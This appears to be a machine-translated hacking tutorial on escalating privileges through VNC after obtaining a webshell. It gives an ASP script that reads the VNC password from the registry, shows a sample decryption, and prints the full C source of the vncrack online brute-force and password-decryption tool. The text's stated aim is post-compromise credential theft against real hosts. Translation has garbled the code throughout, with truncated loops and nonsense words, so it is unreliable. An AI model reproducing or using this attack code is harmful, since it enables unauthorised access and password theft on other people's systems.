How to Use the VNC service to improve Permissions

Author: Xiaohua

In many cases, you generally use ServU to escalate permissions, or find the SA account password. In fact, in addition to this VNC, it is generally run with the highest permissions, and is a graphical interface, the function is similar to that of a remote terminal.

If you get the webshell of a host and want to improve the permission and find that the host runs the VNC service, you can use the following method.

By default, the password of the VNC Server is stored in the registry. This document only applies to this situation.

First, read the encrypted password in the registry using ASP, and then use a cracking tool to crack the password.

I will give you an ASP script to read the VNC password. By default, the VNC password is stored in hkcu/software/orl/winvnc3/Password

Set wshshell = server. Createobject ("wscript. Shell ")
Bkey = wshshell. regread ("hkcu/software/orl/winvnc3/password ")
For each STR in bkey
Response. Write hex (STR)
Next

The result is similar to the hexadecimal format 49 40 15 F9 A3 5E 8B 22. This is the VNC-encrypted password. We can use vncx4

To crack it, vncx4 is easy to use, as long as you enter

C:/> vncx4-W

Then, input the hexadecimal data in sequence. If you do not have to input a carriage return, you can simply enter the hexadecimal data.

For example, if I give a test

H:/tool> vncx4-W
49
40
15
F9
A3
5E
8b
22
Entered hex string: 49 40 15 F9 A3 5E 8B 22
VNC password 123456

Well, I will give the source code and Compilation Program of this tool, and compile the program at the bottom.

/* Project code: vncrack for Windows (vnx4)
*
* FX <fx@phenoelit.de>
* Phenoelit (http://www.phenoelit.de /)
* (C) 2 K
*
* Blocking delay idea by stonneway.
*/
# Include
# Include
# Include
File: // # include
# Include

# Include "d3des. H"
# Include "vncauth. H"
Extern unsigned char fixedkey [8];

# Define Splash "vncrackx4-by phenoelit (http://www.phenoelit.de/)/n"
Int verbose = 0, lbf = 0;
Char * schallange = NULL, * sresponse = NULL;
Void interactive (void );
Void cr_crack (char * wordlist );

Void * sec_malloc (size_t size ){
Void * P;

If (P = malloc (size) = NULL ){
Fprintf (stderr, "malloc () failed for % d Bytes/N", size );
Exit (-1 );
}
Memset (p, 0, size );
Return P;
}

Void usage (void ){
Printf ("vncrackx4/N"
"By phenoelit (http://www.phenoelit.de/)/n "/
"Usage:/N"
"Online:./vncrack-H target.host.com-W wordlist.txt [-oPt's]/n"
"Windows Interactive Mode:./vncrack-W/N"
"/Tenter hex key one byte per line-find it in/N"
"/T // HKEY_CURRENT_USER // software // orl // winvnc3 // password or/N"
"/T // HKEY_USERS //. Default // software // orl // winvnc3 // password/n"
"Options for online mode:/N"
"-V/tverbose (Repeat-V for more)/n"
"-P/tconnect to port P instead of 5900/N"
"Options for phoss intercepted challages:/N"
"-C/tchallange from phoss output/N"
"-R/tresponse from phoss output/N"
);
Exit (-1 );
}

Void sleep (dword ms ){
DWORD T1;

T1 = gettickcount ();
While (gettickcount () <(t1 + MS ));

}

Int main (INT argc, char ** argv ){
Int SFD;/* socket */
Unsigned long dest_ip;
Struct sockaddr_in dest_addr;

Char * rbuf;
Unsigned char Atype [4];
Unsigned char challange [16];

Char * vnchost = NULL;
U_short vncport = 5900;

Int I, Ani = 0;
Char * wordlist = NULL;
File * FD;
Char * tryword;

Char servertext [255];
Char * sthelp;

Int conwait = 90;
Int redocount = 0;
Int redosleep = 10;

/* Check the command line options */
For (I = 1; I switch (argv [I] [1]) {

Case 'V': // verbose
Verbose ++;
Break;
Case 'p ':
If (argv [++ I] = NULL) usage ();
If (vncport = atoi (argv [I]) = 0 ){
Fprintf (stderr, "wrong port number: % s/n", argv [I]);
Exit (-1 );
}
Break;
Case 'H ':
If (argv [++ I] = NULL) usage ();
Vnchost = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (vnchost, argv [I]);
Break;
Case 'W ':
If (argv [++ I] = NULL) usage ();
Wordlist = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (wordlist, argv [I]);
Break;
Case 'W ':
Interactive ();
Break;

Case 'C ':
If (argv [++ I] = NULL) usage ();
Schallange = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (schallange, argv [I]);
Break;
Case 'r ':
If (argv [++ I] = NULL) usage ();
Sresponse = (char *) sec_malloc (strlen (argv [I]) + 1 );
Strcpy (sresponse, argv [I]);
Break;
Case 'r ':
If (argv [++ I] = NULL) usage ();
Redosleep = atoi (argv [I]);
Break;

Default:
Usage ();
}
}

If (schallange | sresponse ){
Printf (splash );
Cr_crack (wordlist);/* exit is done here */
}

If (! (Vnchost & vncport & wordlist) usage ();
Printf (splash );

/* Host */
Dest_ip = inet_addr (vnchost );
Memcpy (& dest_addr.sin_addr, & dest_ip, sizeof (dest_ip ));
Dest_addr.sin_port = htons (vncport );
Dest_addr.sin_family = af_inet;

/* Make sure we can talk Winsock
Comment: I like to enclose this, because it is so ugly */
{
Word wversionrequested;
Wsadata;
Int err;
Wversionrequested = makeword (1, 1 );

Err = wsastartup (wversionrequested, & wsadata );
If (Err! = 0 ){
Fprintf (stderr, "unable to start networking ");
Exit (-1 );
}

} // WSA and go

If (FD = fopen (wordlist, "RT") = NULL ){
Fprintf (stderr, "unable to open wordlist % s/n", wordlist );
Exit (-1 );
}

Tryword = sec_malloc (256 );
While (fgets (tryword, 255, FD )! = NULL ){
/* Cut the word */
If (tryword [strlen (tryword)-1] = '/N') tryword [strlen (tryword)-1] ='/0 ';

Redoclosed:
If (verbose ){
Printf ("/ntrying '% s'...", tryword );
Fflush (stdout );
}

If (SFD = socket (af_inet, sock_stream, 0) = invalid_socket ){
Fprintf (stderr, "unable to get a socket ");
Exit (-1 );
}

If (connect (SFD, (struct sockaddr *) & dest_addr, sizeof (dest_addr ))! = 0 ){
Fprintf (stderr, "Connect failed (% d)./N", wsagetlasterror ());
Exit (-1 );
}

/* Connunication starts with server-> Client Version packet */
Rbuf = sec_malloc (100 );
If (Recv (SFD, rbuf, 100,0) <0 ){
Fprintf (stderr, "Recv ()");
Exit (-1 );
}
If (verbose> 1) printf ("/nserver Protocol Version: % s", rbuf );

/* Bounce this message back-so the server will continue */
If (send (SFD, rbuf, strlen (rbuf), 0) <0 ){
Fprintf (stderr, "Send ()");
Exit (-1 );
}

If (Recv (SFD, Atype, sizeof (Atype), 0) <0 ){
Fprintf (stderr, "Recv ()");
Exit (-1 );
}

If (verbose> 1 ){
Printf ("authentication type :");
For (I = 0; I <4; I ++) {printf ("% x", Atype [I]);}
Printf ("/N ");
}

Switch (Atype [3]) {
Case 0:
Fprintf (stderr, "server told me: connection close/N ");
If (verbose ){
// Try to retrieve the reason
Memset (servertext, 0, sizeof (servertext ));
If (Recv (SFD, servertext, sizeof (servertext), 0) <0 ){
Fprintf (stderr, "Recv () in verbose ");
Exit (-1 );
} Else {
Sthelp = servertext;
Sthelp + = 4;
Fprintf (stderr, "server says: % s/n", sthelp );
}
If (verbose) printf ("/twaiting for blocking disable/N ");
Sleep (redosleep * 1000 );
If (redocount ++) <3 ){
Goto redoclosed;
} Else {
Fprintf (stderr, "/tgiving up (increase-R)/n ");
}
}
Exit (-1 );
Break;/* not reached */
Case 1:
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Server does not require authentication! /N"
">>>>>>>>>>>>>>>/N ");
Exit (-1 );
Break;/* not reached */
Case 2:
If (verbose> 1)
Printf ("authentication type 'vnc authentication '-fine/N ");
Break;
Default:
Fprintf (stderr, "unknown authentication requested by server/N ");
Exit (-1 );
}
Redocount = 0;

If (Recv (SFD, challange, sizeof (challange), 0) <0 ){
Fprintf (stderr, "Recv ()");
Exit (-1 );
}

If (verbose> 1 ){
Printf ("challange :");
For (I = 0; I <16; I ++) {printf ("% x", challange [I]);}
Printf ("/N ");
}

/* Encrypt challange with password and send this fuck to the server */
Vncencryptbytes (challange, tryword );

If (send (SFD, challange, sizeof (challange), 0) <0 ){
Fprintf (stderr, "auth send ()");
Exit (-1 );
}

AType [3] = 0;
If (Recv (SFD, Atype, sizeof (Atype), 0) <0 ){
Fprintf (stderr, "auth Recv ()");
Exit (-1 );
}
Switch (Atype [3]) {
Case 0:
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N", tryword );
Free (tryword );
Exit (0 );
Break;/* not reached */

Case 1:/* 'normal' failed */
If (verbose) printf ("failed/N ");
Break;
Case 2:/* too then */
Printf ("server is angry, waiting for calm down.../N ");
Sleep (10000 );
Break;
Default:
Fprintf (stderr, "unknown response/N ");
Exit (-1 );
}

Shutdown (SFD, 2 );

Closesocket (SFD );
Memset (tryword, 0,256 );
}

Free (tryword );
Fclose (FD );

Return 0;
}

Void interactive (void ){
Unsigned char * pass;
Int I;
Char C;

Pass = (char *) sec_malloc (9 );
For (I = 0; I <8; I ++ ){
Scanf ("% x", & C );
Pass [I] = C;
}
Printf ("entered hex string :");
For (I = 0; I <8; I ++) {printf ("% x", pass [I]);}
Printf ("/N ");

Specified ey (fixedkey, de1 );
Des (Pass, pass );
Printf ("VNC password: % s/n", pass );

Exit (0 );
}

Void cr_crack (char * wordlist ){
Int I, J;
# Define CRL 16
Char chlorophyll [CRL + 1];
Char RSP [CRL + 1];
Char tchlorophyll [CRL + 1];
Char ts [3];
File * FD;
Char * tryword;

Char BFT [9];
Char cset1 [] =
"Abcdefghijklmnopqrstuvwxyz"
"Abcdefghijklmnopqrstuvwxyz"
"1234567890! /"$ % &/() =? ''' * _:;-., # +}] [{^ <> Success/0 ";
# Define cset1_len (92)
Int CNT [8];

Time_t T1, T2;

If (! Wordlist ){
Fprintf (stderr, "supply wordlist file! ");
Exit (-1 );
}

If ((! Schallange) | (! Sresponse )){
Usage ();
}
If (
(Strlen (schallange )! = 16*2)
| (Strlen (sresponse )! = 16*2)
){
Fprintf (stderr,
"Challange and response have to be 32 characters each/N ");
Exit (-1 );
}

Memset (& chlorophyll, 0, CRL + 1 );
Memset (& tchlorophyll, 0, CRL + 1 );
Memset (& RSP, 0, CRL + 1 );
Memset (& TS, 0, 3 );

J = 0;
For (I = 0; I strncpy (TS, & schallange [J], 2 );
Chlorophyll [I] = (unsigned char) strtol (TS, null, 16 );
Strncpy (TS, & sresponse [J], 2 );
RSP [I] = (unsigned char) strtol (TS, null, 16 );
J + = 2;
}
If (verbose ){
Printf ("challange :");
For (I = 0; I printf ("% x", (unsigned char) Chlorophyll [I]);
}
Printf ("/N ");
Printf ("response :");
For (I = 0; I printf ("% x", (unsigned char) RSP [I]);
}
Printf ("/N ");
}

If (FD = fopen (wordlist, "RT") = NULL ){
Fprintf (stderr, "cocould not open wordlist/N ");
Exit (-1 );
}

Tryword = sec_malloc (256 );
While (fgets (tryword, 255, FD )! = NULL ){
Tryword [strlen (tryword)-1] = '/0 ';
/* Try this word */
Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, tryword );

If (verbose> 1 ){
For (I = 0; I printf ("% x", (unsigned char) RSP [I]);
}
Printf ("/N ");
For (I = 0; I printf ("% x", (unsigned char) tchlorophyll [I]);
}
Printf ("/N ");
}

If (! Memcmp (tchlorophyll, RSP, CRL )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N", tryword );
Free (tryword );
Exit (0 );
} Else {
If (verbose) printf ("% s failed/N", tryword );
}
Memset (tryword, 0,256 );
}
Fclose (FD );
Free (tryword );

Printf ("-----------------------------------/N"
"Wordlist failed-going brute force/N"
"-----------------------------------/N ");

T1 = gettickcount ();

BFT [8] = '/0 ';

BFT [1] = '/0 ';
Printf ("/tdepth I/N ");
For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0

BFT [2] = '/0 ';
Printf ("/tdepth II/N ");
For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1

/************/
BFT [3] = '/0 ';
Printf ("/tdepth III/N ");
For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];

For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2

/************/
BFT [4] = '/0 ';
Printf ("/tdepth IV/N ");
For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];

For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];

For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3

/************/
BFT [5] = '/0 ';
Printf ("/tdepth V/N ");
For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];

For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];

For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];

For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4

/************/
BFT [6] = '/0 ';
Printf ("/tdepth VI/N ");
For (CNT [5] = 0; CNT [5] BFT [5] = cset1 [CNT [5];

For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];

For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];

For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];

For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
} File: // 5

/************/
BFT [7] = '/0 ';
Printf ("/tdepth VII/N ");
For (CNT [6] = 0; CNT [6] BFT [6] = cset1 [CNT [6];

For (CNT [5] = 0; CNT [5] BFT [5] = cset1 [CNT [5];

For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];

For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];

For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];

For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
} File: // 5
} File: // 6

/************/
BFT [8] = '/0 ';
Printf ("/tdepth VIII/N ");
For (CNT [7] = 0; CNT [7] BFT [7] = cset1 [CNT [7];

For (CNT [6] = 0; CNT [6] BFT [6] = cset1 [CNT [6];

For (CNT [5] = 0; CNT [5] BFT [5] = cset1 [CNT [5];

For (CNT [4] = 0; CNT [4] BFT [4] = cset1 [CNT [4];

For (CNT [3] = 0; CNT [3] BFT [3] = cset1 [CNT [3];

For (CNT [2] = 0; CNT [2] BFT [2] = cset1 [CNT [2];

For (CNT [1] = 0; CNT [1] BFT [1] = cset1 [CNT [1];

For (CNT [0] = 0; CNT [0] BFT [0] = cset1 [CNT [0];

If (verbose)
Printf ("try: % s/n", BFT );

Memcpy (tchlorophyll, chlorophyll, CRL );
Vncencryptbytes (tchlorophyll, BFT );
If (! Memcmp (tchlorophyll, RSP, 16 )){
Printf ("/n >>>>>>>>>>>>>>>>/N"
"Password: % S/N"
">>>>>>>>>>>>>>>/N ",
BFT );
Exit (0 );
}
} // For 0
} // For 1
} File: // 2
} File: // 3
} File: // 4
} File: // 5
} File: // 6
} File: // 7
T2 = gettickcount ();
Printf ("depth VIII (% 1274f WPS)/n", (t2-t1)/63 );

Printf ("not in character set! /N ");

Exit (0 );
}